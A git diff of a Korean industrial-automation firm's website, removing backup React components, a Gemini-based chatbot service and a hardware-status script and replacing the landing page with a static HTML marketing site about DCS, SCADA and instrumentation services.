document.getElementById('contact-message').value.trim(); - const btn = document.getElementById('contact-submit'); - - if (!name || !email || !message) { - showStatus('error', t('contact.error.required')); return; - } - if (!/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email)) { - showStatus('error', t('contact.error.email')); return; - } - - btn.disabled = true; - btn.textContent = t('contact.sending'); - - const templateParams = { - name : name, - message : 'Email : ' + email + '\nCompany : ' + (company || 'N/A') + '\n\n' + message, - reply_to : email - }; - - emailjs.send(EMAILJS_SERVICE_ID, EMAILJS_TEMPLATE_ID, templateParams) - .then(function () { - showStatus('success', t('contact.success')); - document.getElementById('contact-name').value = ''; - document.getElementById('contact-email').value = ''; - document.getElementById('contact-company').value = ''; - document.getElementById('contact-message').value = ''; - }) - .catch(function (error) { - console.error('EmailJS error:', error); - showStatus('error', t('contact.error.fail')); - }) - .finally(function () { - btn.disabled = false; - btn.textContent = t('contact.btn'); - }); -}); - -function showStatus(type, msg) { - const status = document.getElementById('contact-status'); - status.classList.remove('hidden', 'bg-green-500/20', 'text-green-400', 'bg-red-500/20', 'text-red-400'); - status.classList.add(type === 'success' ? 'bg-green-500/20' : 'bg-red-500/20', - type === 'success' ? 'text-green-400' : 'text-red-400'); - status.textContent = msg; -} - -// ── Header scroll ──────────────────────────────────────────── -const mainHeader = document.getElementById('main-header'); -const brandName = document.getElementById('brand-name'); -const navLinks = document.querySelectorAll('.nav-link'); - -window.addEventListener('scroll', () => { - if (window.scrollY > 50) { - mainHeader.classList.add('glass-effect', 'py-3'); - mainHeader.classList.remove('py-6'); - if (brandName) brandName.classList.replace('text-white', 'text-slate-900'); - navLinks.forEach(link => link.classList.replace('text-slate-100', 'text-slate-700')); - } else { - mainHeader.classList.remove('glass-effect', 'py-3'); - mainHeader.classList.add('py-6'); - if (brandName) brandName.classList.replace('text-slate-900', 'text-white'); - navLinks.forEach(link => link.classList.replace('text-slate-700', 'text-slate-100')); - } -}); - -// ── Mobile menu ─────────────────────────────────────────────── -const mobileMenuBtn = document.getElementById('mobile-menu-btn'); -const mobileMenu = document.getElementById('mobile-menu'); -const closeMenuBtn = document.getElementById('close-menu-btn'); - -if (mobileMenuBtn) mobileMenuBtn.addEventListener('click', () => mobileMenu.classList.remove('translate-x-full')); -if (closeMenuBtn) closeMenuBtn.addEventListener('click', () => mobileMenu.classList.add('translate-x-full')); - -const mobileNavLinks = mobileMenu ? mobileMenu.querySelectorAll('a') : []; -mobileNavLinks.forEach(link => link.addEventListener('click', () => mobileMenu.classList.add('translate-x-full'))); diff --git a/.Backup/html/components/About.tsx b/.Backup/html/components/About.tsx deleted file mode 100644 index 678ac05..0000000 --- a/.Backup/html/components/About.tsx +++ /dev/null @@ -1,57 +0,0 @@ - -import React from 'react'; - -const About: React.FC = () => { - return ( -
-
-
-
-
- Our Engineering Facility -
-
-
15+
-
Years of Industrial Excellence
-
-
- -
-

Our Identity

-

- Designing the Future of Industrial Frameworks -

-

- Hanmo Control & Network Co., Ltd. was established on the foundation that industrial automation must be inherently reliable, perfectly integrated, and intelligently scalable. -

-

- As strategic partners for global leaders transitioning into Industry 4.0, our experts specialize in everything from site-wide instrumentation to enterprise-grade data management. -

- -
- {[ - { title: 'Reliability Focused', icon: 'fa-shield-halved' }, - { title: 'Global Standards', icon: 'fa-globe' }, - { title: '24/7 Support', icon: 'fa-clock' }, - { title: 'Custom R&D', icon: 'fa-flask' }, - ].map((item, i) => ( -
-
- -
- {item.title} -
- ))} -
-
-
-
-
- ); -}; - -export default About; diff --git a/.Backup/html/components/ChatBot.tsx b/.Backup/html/components/ChatBot.tsx deleted file mode 100644 index 333914a..0000000 --- a/.Backup/html/components/ChatBot.tsx +++ /dev/null @@ -1,100 +0,0 @@ - -import React, { useState, useRef, useEffect } from 'react'; -import { chatWithExpert } from '../services/geminiService'; -import { Message } from '../types'; - -const ChatBot: React.FC = () => { - const [isOpen, setIsOpen] = useState(false); - const [input, setInput] = useState(''); - const [messages, setMessages] = useState([ - { role: 'model', text: "Welcome to Hanmo! I'm your Technical Assistant. How can I help you with our DCS, SCADA, or field instrument solutions today?" } - ]); - const [isLoading, setIsLoading] = useState(false); - const scrollRef = useRef(null); - - useEffect(() => { - if (scrollRef.current) { - scrollRef.current.scrollTop = scrollRef.current.scrollHeight; - } - }, [messages, isOpen]); - - const handleSend = async () => { - if (!input.trim() || isLoading) return; - - const userMsg = input.trim(); - setInput(''); - setMessages(prev => [...prev, { role: 'user', text: userMsg }]); - setIsLoading(true); - - const history = messages.map(m => ({ role: m.role, text: m.text })); - const responseText = await chatWithExpert(userMsg, history); - - setMessages(prev => [...prev, { role: 'model', text: responseText }]); - setIsLoading(false); - }; - - return ( -
- - - {isOpen && ( -
-
-
- - Tech Advisor -
-
-
- -
- {messages.map((m, i) => ( -
-
- {m.text} -
-
- ))} - {isLoading && ( -
-
-
-
-
-
-
- )} -
- -
- setInput(e.target.value)} - onKeyDown={(e) => e.key === 'Enter' && handleSend()} - placeholder="Ask a technical question..." - className="flex-1 bg-slate-100 text-sm p-3 rounded-xl outline-none focus:ring-2 focus:ring-blue-600/20" - /> - -
-
- )} -
- ); -}; - -export default ChatBot; diff --git a/.Backup/html/components/Contact.tsx b/.Backup/html/components/Contact.tsx deleted file mode 100644 index e689ae7..0000000 --- a/.Backup/html/components/Contact.tsx +++ /dev/null @@ -1,123 +0,0 @@ - -import React, { useState } from 'react'; - -const Contact: React.FC = () => { - const [status, setStatus] = useState<'idle' | 'sending' | 'success'>('idle'); - - const handleSubmit = (e: React.FormEvent) => { - e.preventDefault(); - setStatus('sending'); - setTimeout(() => setStatus('success'), 1500); - }; - - return ( -
-
-
- {/* Information Section */} -
-
-

Get in Touch

-

- Ready to optimize your industrial infrastructure? Our engineering team is standing by to assist with your technical inquiries. -

- -
-
-
- -
-
-

Headquarters

-

Industrial Hub B123, Gangnam District
Seoul, South Korea

-
-
-
-
- -
-
-

Phone

-

+82 2-1234-5678

-
-
-
-
- -
-
-

Email

-

solutions@hanmocontrol.com

-
-
-
-
- - -
- - {/* Form Section */} -
- {status === 'success' ? ( -
-
- -
-

Inquiry Received

-

Thank you for reaching out. An automation consultant will review your request and contact you within 24 hours.

- -
- ) : ( -
-
-
- - -
-
- - -
-
-
- - -
-
- - -
- -
- )} -
-
-
-
- ); -}; - -export default Contact; diff --git a/.Backup/html/components/Footer.tsx b/.Backup/html/components/Footer.tsx deleted file mode 100644 index 527869d..0000000 --- a/.Backup/html/components/Footer.tsx +++ /dev/null @@ -1,74 +0,0 @@ - -import React from 'react'; - -const Footer: React.FC = () => { - return ( - - ); -}; - -export default Footer; diff --git a/.Backup/html/components/Header.tsx b/.Backup/html/components/Header.tsx deleted file mode 100644 index e8b1c39..0000000 --- a/.Backup/html/components/Header.tsx +++ /dev/null @@ -1,88 +0,0 @@ - -import React, { useState, useEffect } from 'react'; - -const Header: React.FC = () => { - const [isScrolled, setIsScrolled] = useState(false); - const [isMobileMenuOpen, setIsMobileMenuOpen] = useState(false); - - useEffect(() => { - const handleScroll = () => setIsScrolled(window.scrollY > 20); - window.addEventListener('scroll', handleScroll); - return () => window.removeEventListener('scroll', handleScroll); - }, []); - - const navItems = [ - { name: 'Home', href: '#/' }, - { name: 'Services', href: '#/services' }, - { name: 'About', href: '#/about' }, - { name: 'Contact', href: '#/contact' }, - ]; - - return ( -
-
- -
- H -
-
- - HANMO - - - Control & Network - -
-
- - {/* Desktop Nav */} - - -
- -
- - {/* Mobile menu toggle */} - -
- - {/* Mobile Menu Drawer */} - -
- ); -}; - -export default Header; diff --git a/.Backup/html/components/Hero.tsx b/.Backup/html/components/Hero.tsx deleted file mode 100644 index 1fd122a..0000000 --- a/.Backup/html/components/Hero.tsx +++ /dev/null @@ -1,55 +0,0 @@ - -import React from 'react'; - -const Hero: React.FC = () => { - return ( -
-
- Control Room -
-
- -
-
-
- Next-Gen Industrial Solutions -
-

- Engineering Precision
for Industrial Networks -

-

- Hanmo Control & Network Co., Ltd. delivers global-standard DCS and SCADA infrastructure for mission-critical industrial ecosystems and digital transformation. -

- -
- -
- {[ - { label: 'Installed Nodes', value: '1,500+' }, - { label: 'Uptime', value: '99.99%' }, - { label: 'Certified Experts', value: '60+' }, - { label: 'Years Active', value: '15' }, - ].map((stat, i) => ( -
-
{stat.value}
-
{stat.label}
-
- ))} -
-
-
- ); -}; - -export default Hero; diff --git a/.Backup/html/components/Services.tsx b/.Backup/html/components/Services.tsx deleted file mode 100644 index 485fe48..0000000 --- a/.Backup/html/components/Services.tsx +++ /dev/null @@ -1,78 +0,0 @@ - -import React from 'react'; -import { ServiceItem } from '../types'; - -const SERVICES: ServiceItem[] = [ - { - id: 'dcs', - title: 'Distributed Control (DCS)', - description: 'Advanced, redundant control architectures designed for continuous process industries including power generation and chemicals.', - icon: 'fa-network-wired', - image: 'https://images.unsplash.com/photo-1518770660439-4636190af475?auto=format&fit=crop&q=80&w=800' - }, - { - id: 'scada', - title: 'SCADA Solutions', - description: 'High-performance monitoring platforms with cutting-edge HMI, real-time analytics, and secure remote access protocols.', - icon: 'fa-chart-line', - image: 'https://images.unsplash.com/photo-1551288049-bebda4e38f71?auto=format&fit=crop&q=80&w=800' - }, - { - id: 'database', - title: 'Industrial Historians', - description: 'Mission-critical database servers and SQL infrastructure optimized for heavy manufacturing data and regulatory compliance.', - icon: 'fa-database', - image: 'https://images.unsplash.com/photo-1558494949-ef010cbdcc48?auto=format&fit=crop&q=80&w=800' - }, - { - id: 'instruments', - title: 'Control Instruments', - description: 'Precision field instruments including flow, pressure, and temperature transmitters and smart control valves.', - icon: 'fa-gauge-high', - image: 'https://images.unsplash.com/photo-1531482615713-2afd69097998?auto=format&fit=crop&q=80&w=800' - } -]; - -const Services: React.FC = () => { - return ( -
-
-
-

Capabilities

-

World-Class Automation

-

- We bridge the gap between heavy physical operations and digital intelligence through robust networking and control systems. -

-
- -
- {SERVICES.map((service) => ( -
-
- {service.title} -
-
-
- -
-

{service.title}

-

- {service.description} -

- - Technical Specs - -
-
- ))} -
-
-
- ); -}; - -export default Services; diff --git a/.Backup/html/index.tsx b/.Backup/html/index.tsx deleted file mode 100644 index aaa0c6e..0000000 --- a/.Backup/html/index.tsx +++ /dev/null @@ -1,16 +0,0 @@ - -import React from 'react'; -import ReactDOM from 'react-dom/client'; -import App from './App'; - -const rootElement = document.getElementById('root'); -if (!rootElement) { - throw new Error("Could not find root element to mount to"); -} - -const root = ReactDOM.createRoot(rootElement); -root.render( - - - -); diff --git a/.Backup/html/metadata.json b/.Backup/html/metadata.json deleted file mode 100644 index 521d72a..0000000 --- a/.Backup/html/metadata.json +++ /dev/null @@ -1,7 +0,0 @@ -{ - "name": "Hanmo Control & Network Co., Ltd.", - "description": "Premium industrial automation solutions provider specializing in DCS, SCADA, Database Servers, and Control Instruments.", - "requestFramePermissions": [ - "camera" - ] -} \ No newline at end of file diff --git a/.Backup/html/package.json b/.Backup/html/package.json deleted file mode 100644 index 53a194c..0000000 --- a/.Backup/html/package.json +++ /dev/null @@ -1,23 +0,0 @@ -{ - "name": "hanmo-control-&-network-co.,-ltd.", - "private": true, - "version": "0.0.0", - "type": "module", - "scripts": { - "dev": "vite", - "build": "vite build", - "preview": "vite preview" - }, - "dependencies": { - "react": "^19.2.4", - "react-dom": "^19.2.4", - "@google/genai": "^1.41.0", - "react-router-dom": "^7.13.0" - }, - "devDependencies": { - "@types/node": "^22.14.0", - "@vitejs/plugin-react": "^5.0.0", - "typescript": "~5.8.2", - "vite": "^6.2.0" - } -} diff --git a/.Backup/html/services/geminiService.ts b/.Backup/html/services/geminiService.ts deleted file mode 100644 index 480d86b..0000000 --- a/.Backup/html/services/geminiService.ts +++ /dev/null @@ -1,36 +0,0 @@ - -import { GoogleGenAI } from "@google/genai"; - -const SYSTEM_INSTRUCTION = `You are the primary AI Technical Consultant for "Hanmo Control & Network Co., Ltd.". -Hanmo is a global leader specializing in: -1. DCS (Distributed Control Systems): High-availability process automation for utility-scale industries. -2. SCADA (Supervisory Control and Data Acquisition): Real-time remote operations and monitoring. -3. Database & Historian Servers: Secure, high-speed industrial data management. -4. Precision Control Instruments: Smart sensors and actuators for flow, pressure, and thermal management. - -Tone: Professional, highly technical, authoritative, and helpful. -Language: You must respond in English at all times. -Guidance: Provide expert advice on automation architecture and integration. For pricing or project-specific quotes, instruct the user to use the official contact form on the website.`; - -export async function chatWithExpert(message: string, history: {role: 'user' | 'model', text: string}[]) { - try { - const ai = new GoogleGenAI({ apiKey: process.env.API_KEY || '' }); - - const response = await ai.models.generateContent({ - model: 'gemini-3-flash-preview', - contents: [ - ...history.map(h => ({ role: h.role === 'user' ? 'user' : 'model', parts: [{ text: h.text }] })), - { role: 'user', parts: [{ text: message }] } - ], - config: { - systemInstruction: SYSTEM_INSTRUCTION, - temperature: 0.7, - }, - }); - - return response.text || "I apologize, but I am unable to process your technical inquiry right now. Please try again later."; - } catch (error) { - console.error("Gemini API Error:", error); - return "Our technical advisor is currently offline. Please contact our support team directly via email."; - } -} diff --git a/.Backup/html/status.json b/.Backup/html/status.json deleted file mode 100644 index d24186d..0000000 --- a/.Backup/html/status.json +++ /dev/null @@ -1 +0,0 @@ -{"cpu_temp": "39", "nvme_temp": "33", "uptime_days": 4, "last_update": "10:51:01"} \ No newline at end of file diff --git a/.Backup/html/tsconfig.json b/.Backup/html/tsconfig.json deleted file mode 100644 index 2c6eed5..0000000 --- a/.Backup/html/tsconfig.json +++ /dev/null @@ -1,29 +0,0 @@ -{ - "compilerOptions": { - "target": "ES2022", - "experimentalDecorators": true, - "useDefineForClassFields": false, - "module": "ESNext", - "lib": [ - "ES2022", - "DOM", - "DOM.Iterable" - ], - "skipLibCheck": true, - "types": [ - "node" - ], - "moduleResolution": "bundler", - "isolatedModules": true, - "moduleDetection": "force", - "allowJs": true, - "jsx": "react-jsx", - "paths": { - "@/*": [ - "./*" - ] - }, - "allowImportingTsExtensions": true, - "noEmit": true - } -} \ No newline at end of file diff --git a/.Backup/html/types.ts b/.Backup/html/types.ts deleted file mode 100644 index 3372801..0000000 --- a/.Backup/html/types.ts +++ /dev/null @@ -1,20 +0,0 @@ - -export interface Message { - role: 'user' | 'model'; - text: string; -} - -export interface ServiceItem { - id: string; - title: string; - description: string; - icon: string; - image: string; -} - -export interface ContactFormData { - name: string; - email: string; - subject: string; - message: string; -} diff --git a/.Backup/html/vite.config.ts b/.Backup/html/vite.config.ts deleted file mode 100644 index ee5fb8d..0000000 --- a/.Backup/html/vite.config.ts +++ /dev/null @@ -1,23 +0,0 @@ -import path from 'path'; -import { defineConfig, loadEnv } from 'vite'; -import react from '@vitejs/plugin-react'; - -export default defineConfig(({ mode }) => { - const env = loadEnv(mode, '.', ''); - return { - server: { - port: 3000, - host: '0.0.0.0', - }, - plugins: [react()], - define: { - 'process.env.API_KEY': JSON.stringify(env.GEMINI_API_KEY), - 'process.env.GEMINI_API_KEY': JSON.stringify(env.GEMINI_API_KEY) - }, - resolve: { - alias: { - '@': path.resolve(__dirname, '.'), - } - } - }; -}); diff --git a/.Backup/index.html b/.Backup/index.html index c8d412e..d8e395e 100644 --- a/.Backup/index.html +++ b/.Backup/index.html @@ -1,58 +1,655 @@ - + - 한모CNN - 서비스 준비 중 - + + + 한모씨앤앤 | Hanmo Control & Network - DCS SCADA 자동제어 + + + + + - -
-

HANMO CONTROL & NETWORK CO., LTD.

-

시스템 정식 서비스 준비 중입니다.

-
-
- CPU - --°C + + + + + + +
+
+ +
+ H +
+
+ HANMO + Control & Network +
+
+ + + + + +
-
- NVMe - --°C -
-
- UPTIME - -- DAYS +
+ + +
+
+ +
+ + +
+
+
-
- LIVE SCAN: -- -
-
- + + +
+ +
+
+ Industrial Facility +
+
+
+
+
Precision Industrial Control
+

+ Engineering Precision Industrial Control +

+

+ Hanmo Control & Network Co., Ltd. provides elite-tier DCS and SCADA architectures for critical infrastructure and modern digital transformation. +

+ +
+
+
+
100+
+
Reference Projects
+
+
+
0.01%
+
downtime
+
+
+
20+
+
Partners
+
+
+
20+
+
Years Excellence
+
+
+
+
+ +
+
+
+

+ Advanced Control Systems +

+

+ DCS Integration +

+

+ Enterprise-grade Distributed Control System architecture designed for the most critical industrial applications. +

+
+ +
+ +
+ DCS Control Room +
+ +
+ +
+ Honeywell Logo +

+ Reliable DCS solutions with Honeywell's Experion PKS, ensuring seamless integration and optimal performance +

+
+ + +
+
+
+
+ +
+
+
+

Redundant Architecture

+

+ Fault-tolerant systems with dual processing units ensuring 99.99% uptime +

+
+
+ +
+
+
+ +
+
+
+

Real-time Communication

+

+ Sub-millisecond response times with synchronized control across multiple nodes +

+
+
+ +
+
+
+ +
+
+
+

Security Certified

+

+ IEC 62443 compliance with military-grade encryption protocols +

+
+
+
+ + + +
+
+
+
+ +
+
+
+

Process Automation

+

Batch Process Control

+

Not only precision control, but also production planning,process data & historical lot management, you can get it by our Batch Manager software.

+
+
+
+
+
+
+

Batch Manager Software

Dynamic recipe engine with version control and audit trail capabilities

+
+
+
+

HC-900 Controller

Advanced batch control with integrated HART communication and real-time monitoring

+
+
+
+

Process Data Management

Comprehensive process data collection, storage, and analysis for batch operations

+
+
+
+

Quick Production Setup

Real-time batch tracking with predictive quality monitoring

+
+
+
+

Easy Historical Tracking

FDA 21 CFR Part 11 compliance and complete data integrity

+
+
+ +
+
Batch Process
+
+
+
+ +
+
+
+

Data Infrastructure

+

Database Server Solutions

+

Mission-critical historian and data management infrastructure for continuous industrial operations.

+
+
+
+
+

High-Performance Historian

+

SQL Server-based architecture optimized for 1M+ data points per second with sub-second query response

+
    +
  • Time-series optimization
  • +
  • Automatic compression
  • +
  • Hot-cold storage
  • +
+
+
+
+

Disaster Recovery

+

Geo-redundant replication with RTO < 15 minutes and RPO < 5 minutes

+
    +
  • Multi-site failover
  • +
  • Continuous backup
  • +
  • Zero data loss
  • +
+
+
+
+

Security & Compliance

+

Role-based access control, encryption at rest/transit, and full audit logging

+
    +
  • ISO 27001 certified
  • +
  • CCPA/GDPR compliant
  • +
  • Immutable logs
  • +
+
+
+ +
+
+ + +
+
+
+

Precision Measurement

+

Control Instruments

+

Optimal Precision Starts with Understanding of Your Environment

+
+
+
+
+

Flow Transmitters

Magnetic, Coriolis, and vortex flow meters with ±0.5% accuracy

+
Endress+Hauser
Flownics
Azbil , Honeywell
+ +
+
+
+
+

Pressure Transmitters

Differential and absolute pressure sensors for ultra-high sensitivity

+
Azbil
Honeywell
Autonics , Endress+Hauser
+ +
+
+
+
+

Temperature Sensors

RTD, thermocouple, and infrared temperature measurement

+
Autonics
Azbil
Honeywell , Endress+Hauser
+ +
+
+
+
+

Level Transmitters

Ultrasonic, radar, capacitive and float level sensors

+
Endress+Hauser
Seojin Instec
Hanil Level
+ +
+
+
+
+

Analytical Sensors

pH, conductivity, oxygen, and dissolved gas analyzers

+
Honeywell Analytics
Toa DKK
Gastron
+ +
+
+
+
+

Control Valves

Smart positioners with HART communication

+
Komoto (Motoyama Korea)
Azbil
Honeywell
+ +
+
+
+
+

Shutoff Valves

Accelerometers and velocity sensors for predictive maintenance

+
Automa
Proval
Flowserve
+ +
+
+
+
+

Smart Data Loggers

IoT-enabled data acquisition units with cloud connectivity

+
16-32 analog channels
4G/WiFi/Ethernet
Local data storage
+ +
+
+
+ +
+
+ + +
+
+
+

Referenced Plant Varieties

+

Versatile Process References

+

From deep understanding of various industry references to Seamless Execution.

+
+
+
+
DCS
+
+
+

DCS Integration

+ +
    + +
  • + + +
  • + +
  • + + +
  • + +
  • + + +
  • + +
  • + + +
  • + +
+ + + +
+
+
+
SCADA
+
+
+

SCADA Design

+ +
    + +
  • + + +
  • + +
  • + + +
  • + +
  • + + +
  • + +
+ +
+
+
+
Historian
+
+
+

Data Historians

+ +
    + +
  • + + +
  • + +
  • + + +
  • + +
  • + + +
  • +
  • + + +
  • +
+ +
+
+
+
Instruments
+
+
+

Control Instruments

+ +
    + +
  • + + +
  • + +
  • + + +
  • + +
  • + + +
  • +
  • + + +
  • +
  • + + +
  • +
  • + + +
  • +
+ +
+
+
+
+
+ + +
+
+
+
+
About Hanmo
+
+
20+
+
Years of Industrial Excellence
+
+
+
+

About Hanmo

+

Trusted Partner in Industrial Automation

+

Since our founding, Hanmo Control & Network Co., Ltd. has been at the forefront of industrial automation engineering.

+

Our team of 60+ certified engineers brings decades of combined experience in DCS, SCADA, and industrial networking.

+
+
+
ISO 9001
+
Certified
+
+
+
24 / 7
+
Support
+
+
+
+
+
+
+ + +
+
+
+

Get In Touch

+

Start Your Project

+

Contact our engineering team for a detailed consultation and project assessment.

+
+
+
+
+ + +
+ + + + +
+
+
+
+
+ + +
+
+
+
+ H +
+ HANMO + Control & Network Co., Ltd. +
+

© 2024 Hanmo Control & Network Co., Ltd. All rights reserved.

+
+
+ + + + + + + + - \ No newline at end of file + diff --git a/.Backup/status.json b/.Backup/status.json deleted file mode 100644 index 84a3244..0000000 --- a/.Backup/status.json +++ /dev/null @@ -1 +0,0 @@ -{"cpu_temp": "40", "nvme_temp": "33", "uptime_days": 2, "last_update": "18:31:01"} \ No newline at end of file diff --git a/.Backup/update_status.py b/.Backup/update_status.py deleted file mode 100644 index aeebffe..0000000 --- a/.Backup/update_status.py +++ /dev/null @@ -1,42 +0,0 @@ -# 파일 경로: ~/services/hanmocnn/update_status.py -import json -import os -import time - -def get_temp(name_keyword): - """hwmon 폴더에서 이름 키워드로 온도를 찾아 반환 (milli-degree to degree)""" - try: - base_path = "/sys/class/hwmon" - for folder in os.listdir(base_path): - with open(os.path.join(base_path, folder, "name"), "r") as f: - if name_keyword in f.read(): - with open(os.path.join(base_path, folder, "temp1_input"), "r") as t: - return int(t.read()) // 1000 - except: - return "N/A" - return "N/A" - -def get_hw_info(): - # 1. CPU 온도 (가장 부하가 큰 bigcore0 기준) - cpu_temp = get_temp("bigcore0_thermal") - - # 2. NVMe 온도 - nvme_temp = get_temp("nvme") - - # 3. 가동 시간 (Uptime) - with open("/proc/uptime", "r") as f: - uptime_days = int(float(f.readline().split()[0]) // 86400) - - return { - "cpu_temp": str(cpu_temp), - "nvme_temp": str(nvme_temp), - "uptime_days": uptime_days, - "last_update": time.strftime("%H:%M:%S") - } - -if __name__ == "__main__": - status = get_hw_info() - # 저장 경로: ~/services/hanmocnn/html/status.json - base_dir = os.path.dirname(os.path.abspath(__file__)) - with open(os.path.join(base_dir, "html", "status.json"), "w") as f: - json.dump(status, f) \ No newline at end of file diff --git a/html/App.tsx b/html/App.tsx deleted file mode 100644 index b1f9110..0000000 --- a/html/App.tsx +++ /dev/null @@ -1,50 +0,0 @@ - -import React, { useEffect } from 'react'; -import { HashRouter as Router, Routes, Route, useLocation } from 'react-router-dom'; -import Header from './components/Header'; -import Hero from './components/Hero'; -import Services from './components/Services'; -import About from './components/About'; -import Contact from './components/Contact'; -import Footer from './components/Footer'; -import ChatBot from './components/ChatBot'; - -const ScrollToTop = () => { - const { pathname } = useLocation(); - useEffect(() => { - window.scrollTo(0, 0); - }, [pathname]); - return null; -}; - -const HomePage = () => ( - <> - - - - - -); - -const App: React.FC = () => { - return ( - - -
-
-
- - } /> -
} /> -
} /> -
} /> - - -
- -
- - ); -}; - -export default App; diff --git a/html/README.md b/html/README.md deleted file mode 100644 index 992aff3..0000000 --- a/html/README.md +++ /dev/null @@ -1,20 +0,0 @@ -
-GHBanner -
- -# Run and deploy your AI Studio app - -This contains everything you need to run your app locally. - -View your app in AI Studio: https://ai.studio/apps/drive/12rxvTk7cfpawzA-KqF6Z1AfiIdHEhLqT - -## Run Locally - -**Prerequisites:** Node.js - - -1. Install dependencies: - `npm install` -2. Set the `GEMINI_API_KEY` in [.env.local](.env.local) to your Gemini API key -3. Run the app: - `npm run dev` diff --git a/html/assets/images/icons/icons.svg b/html/assets/images/icons/icons.svg index 8c1750a..cac35f2 100644 --- a/html/assets/images/icons/icons.svg +++ b/html/assets/images/icons/icons.svg @@ -13,7 +13,7 @@ - { - return ( -
-
-
-
-
- Our Engineering Facility -
-
-
15+
-
Years of Industrial Excellence
-
-
- -
-

Our Identity

-

- Designing the Future of Industrial Frameworks -

-

- Hanmo Control & Network Co., Ltd. was established on the foundation that industrial automation must be inherently reliable, perfectly integrated, and intelligently scalable. -

-

- As strategic partners for global leaders transitioning into Industry 4.0, our experts specialize in everything from site-wide instrumentation to enterprise-grade data management. -

- -
- {[ - { title: 'Reliability Focused', icon: 'fa-shield-halved' }, - { title: 'Global Standards', icon: 'fa-globe' }, - { title: '24/7 Support', icon: 'fa-clock' }, - { title: 'Custom R&D', icon: 'fa-flask' }, - ].map((item, i) => ( -
-
- -
- {item.title} -
- ))} -
-
-
-
-
- ); -}; - -export default About; diff --git a/html/components/ChatBot.tsx b/html/components/ChatBot.tsx deleted file mode 100644 index 333914a..0000000 --- a/html/components/ChatBot.tsx +++ /dev/null @@ -1,100 +0,0 @@ - -import React, { useState, useRef, useEffect } from 'react'; -import { chatWithExpert } from '../services/geminiService'; -import { Message } from '../types'; - -const ChatBot: React.FC = () => { - const [isOpen, setIsOpen] = useState(false); - const [input, setInput] = useState(''); - const [messages, setMessages] = useState([ - { role: 'model', text: "Welcome to Hanmo! I'm your Technical Assistant. How can I help you with our DCS, SCADA, or field instrument solutions today?" } - ]); - const [isLoading, setIsLoading] = useState(false); - const scrollRef = useRef(null); - - useEffect(() => { - if (scrollRef.current) { - scrollRef.current.scrollTop = scrollRef.current.scrollHeight; - } - }, [messages, isOpen]); - - const handleSend = async () => { - if (!input.trim() || isLoading) return; - - const userMsg = input.trim(); - setInput(''); - setMessages(prev => [...prev, { role: 'user', text: userMsg }]); - setIsLoading(true); - - const history = messages.map(m => ({ role: m.role, text: m.text })); - const responseText = await chatWithExpert(userMsg, history); - - setMessages(prev => [...prev, { role: 'model', text: responseText }]); - setIsLoading(false); - }; - - return ( -
- - - {isOpen && ( -
-
-
- - Tech Advisor -
-
-
- -
- {messages.map((m, i) => ( -
-
- {m.text} -
-
- ))} - {isLoading && ( -
-
-
-
-
-
-
- )} -
- -
- setInput(e.target.value)} - onKeyDown={(e) => e.key === 'Enter' && handleSend()} - placeholder="Ask a technical question..." - className="flex-1 bg-slate-100 text-sm p-3 rounded-xl outline-none focus:ring-2 focus:ring-blue-600/20" - /> - -
-
- )} -
- ); -}; - -export default ChatBot; diff --git a/html/components/Contact.tsx b/html/components/Contact.tsx deleted file mode 100644 index e689ae7..0000000 --- a/html/components/Contact.tsx +++ /dev/null @@ -1,123 +0,0 @@ - -import React, { useState } from 'react'; - -const Contact: React.FC = () => { - const [status, setStatus] = useState<'idle' | 'sending' | 'success'>('idle'); - - const handleSubmit = (e: React.FormEvent) => { - e.preventDefault(); - setStatus('sending'); - setTimeout(() => setStatus('success'), 1500); - }; - - return ( -
-
-
- {/* Information Section */} -
-
-

Get in Touch

-

- Ready to optimize your industrial infrastructure? Our engineering team is standing by to assist with your technical inquiries. -

- -
-
-
- -
-
-

Headquarters

-

Industrial Hub B123, Gangnam District
Seoul, South Korea

-
-
-
-
- -
-
-

Phone

-

+82 2-1234-5678

-
-
-
-
- -
-
-

Email

-

solutions@hanmocontrol.com

-
-
-
-
- - -
- - {/* Form Section */} -
- {status === 'success' ? ( -
-
- -
-

Inquiry Received

-

Thank you for reaching out. An automation consultant will review your request and contact you within 24 hours.

- -
- ) : ( -
-
-
- - -
-
- - -
-
-
- - -
-
- - -
- -
- )} -
-
-
-
- ); -}; - -export default Contact; diff --git a/html/components/Footer.tsx b/html/components/Footer.tsx deleted file mode 100644 index 527869d..0000000 --- a/html/components/Footer.tsx +++ /dev/null @@ -1,74 +0,0 @@ - -import React from 'react'; - -const Footer: React.FC = () => { - return ( - - ); -}; - -export default Footer; diff --git a/html/components/Header.tsx b/html/components/Header.tsx deleted file mode 100644 index e8b1c39..0000000 --- a/html/components/Header.tsx +++ /dev/null @@ -1,88 +0,0 @@ - -import React, { useState, useEffect } from 'react'; - -const Header: React.FC = () => { - const [isScrolled, setIsScrolled] = useState(false); - const [isMobileMenuOpen, setIsMobileMenuOpen] = useState(false); - - useEffect(() => { - const handleScroll = () => setIsScrolled(window.scrollY > 20); - window.addEventListener('scroll', handleScroll); - return () => window.removeEventListener('scroll', handleScroll); - }, []); - - const navItems = [ - { name: 'Home', href: '#/' }, - { name: 'Services', href: '#/services' }, - { name: 'About', href: '#/about' }, - { name: 'Contact', href: '#/contact' }, - ]; - - return ( -
-
- -
- H -
-
- - HANMO - - - Control & Network - -
-
- - {/* Desktop Nav */} - - -
- -
- - {/* Mobile menu toggle */} - -
- - {/* Mobile Menu Drawer */} - -
- ); -}; - -export default Header; diff --git a/html/components/Hero.tsx b/html/components/Hero.tsx deleted file mode 100644 index 1fd122a..0000000 --- a/html/components/Hero.tsx +++ /dev/null @@ -1,55 +0,0 @@ - -import React from 'react'; - -const Hero: React.FC = () => { - return ( -
-
- Control Room -
-
- -
-
-
- Next-Gen Industrial Solutions -
-

- Engineering Precision
for Industrial Networks -

-

- Hanmo Control & Network Co., Ltd. delivers global-standard DCS and SCADA infrastructure for mission-critical industrial ecosystems and digital transformation. -

- -
- -
- {[ - { label: 'Installed Nodes', value: '1,500+' }, - { label: 'Uptime', value: '99.99%' }, - { label: 'Certified Experts', value: '60+' }, - { label: 'Years Active', value: '15' }, - ].map((stat, i) => ( -
-
{stat.value}
-
{stat.label}
-
- ))} -
-
-
